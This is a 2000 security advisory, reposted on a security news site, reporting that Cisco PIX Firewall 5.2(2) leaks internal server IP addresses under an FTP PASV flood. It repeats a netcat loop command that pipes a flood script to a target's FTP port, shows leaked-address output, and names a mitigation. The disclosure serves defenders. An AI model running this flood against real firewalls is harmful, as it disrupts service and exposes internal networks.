[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Cisco PIX Firewall allow external users to discover internal IPs

Title: Cisco PIX Firewall allow external users to discover internal IPs
Released by: naif
Date: 3rd October 2000
Printable version: Click here
-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1



Hi,  Vulnerability in the Subject it's explained here...



Attached file:

- - Script used for DOS pasvDOS.sh

- - Log of the script PIXLOG.first_172_16.bz2 & PIXLOG.second_172_16.bz2

- - Log of debug debug_ftp.txt.bz2

Log of the Latest session against the second pix on which service network

is 192.168.3.0/24 is on:

http://naif.itapac.net/PIXLOG_latest_192_168.bz2

because it's too big for attach in a mlist.



====

PIX TESTED:

Cisco Secure PIX Firewall Version 5.2(2)



Compiled on Sun 24-Sep-00 18:59 by morlee



skifo-pix up 16 hours 55 mins



Hardware:   SE440BX2, 128 MB RAM, CPU Pentium II 349 MHz

Flash i28F640J5 @ 0x300, 16MB

BIOS Flash AT29C257 @ 0xfffd8000, 32KB



0: ethernet0: address is 00d0.b790.5685, irq 11

1: ethernet1: address is 00e0.b601.cfbd, irq 15

2: ethernet2: address is 00e0.b601.cfbc, irq 10

3: ethernet3: address is 00e0.b601.cfbb, irq 9

4: ethernet4: address is 00e0.b601.cfba, irq 11

5: ethernet5: address is 00d0.b790.512e, irq 10



Licensed Features:

Failover:       Enabled

VPN-DES:        Enabled

VPN-3DES:       Disabled

Maximum Interfaces:     6

Cut-through Proxy:      Enabled

Guards:         Enabled

Websense:       Enabled

Throughput:     Unlimited

ISAKMP peers:   Unlimited



Cisco released 5.2(4) yesterday, and it's time for a 5.2(5) :(



I've tryed to fill  pix memory with the attached pasvDOS.sh shell script piped trought netcat but

i obtained other results...



then from cmd line:



 [~] $ (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14  15 16 17 18 19 20 21 22 23  24 25 26 27 28 29 30; do (sleep 2; (./pasvDOS.sh  | nc eagletmp 21)& )  ; done) >>PIXLOG&



but before starting the "PASV FLOOD" i start logging my ssh session, so we have log all FTP FIXUP DEBUG...



 [~] $ script debug_ftp.txt



The PIX start revelating me the Real ip of the server immediatelly after

it kick me off from ssh with the following error:



Local: Corrupted check bytes on input.



NOW it start replying to my PASV command with the REAL internal ip address of the server...



===== Normal Situation

227 Entering Passive Mode (xxx,xxx,xxx,xx,18,237)

===== Under this kind of dos, after 21th ftp session that flood pix with PASV

227 Entering Passive Mode (172,16,1,2,6,113)



After i change the PIX and network, on another pix with 5.2(2) and i could receive with

this dos:

227 Entering Passive Mode (192,168,3,2,99,37)

Et voila'...



Trying to reproduce this kind of dos/exploit it works only sometimes...

after a reload it usually works after that:



- - I start  (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14  15 16 17 18 19 20 21 22 23  24 25 26 27 28 29 30; do (sleep 2; (./pasvDOS.sh  | nc eagletmp 21)& )  ; done) >>PIXLOG&

- - I leave it running for some minutes

- - I kill all connection killing the "nc" process

- - Wait for 2/3 minutes

- - Restart with  (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14  15 16 17 18 19 20 21 22 23  24 25 26 27 28 29 30; do (sleep 2; (./pasvDOS.sh  | nc eagletmp 21)& )  ; done) >>PIXLOG&



but i cannot figure why.





I notice that using "fixup ftp strict 21" could block this kind of attack

and error in debug is :



get_cmd: ERR: command not terminated



but it's also true that with "fixup ftp strict 21" many ftp-client doesn't work with ftp server inside the pix...





p.s. all ppl now know that "mork" have to offer me a lunch ;)



Pietrosanti  Fabio (naif)

E-mail: naif@inet.it 

PGP Key (DSS) http://naif.itapac.net/naif.asc

 --

Free advertising: www.openbsd.org - Multiplatform Ultra-secure OS



-----BEGIN PGP SIGNATURE-----

Version: GnuPG v1.0.1 (GNU/Linux)

Comment: For info see http://www.gnupg.org

Filter: gpg4pine 4.1 (http://azzie.robotics.net)



iD8DBQE52bPQdK5I1NnlcMYRAjN7AKDTZSntnK6lmtFqq3r9WtWR6TJnIgCfQ8LN

MhtFpAc2KZMcrcOf82OAaJk=

=uso7

-----END PGP SIGNATURE-----








(C) 1999-2000 All rights reserved.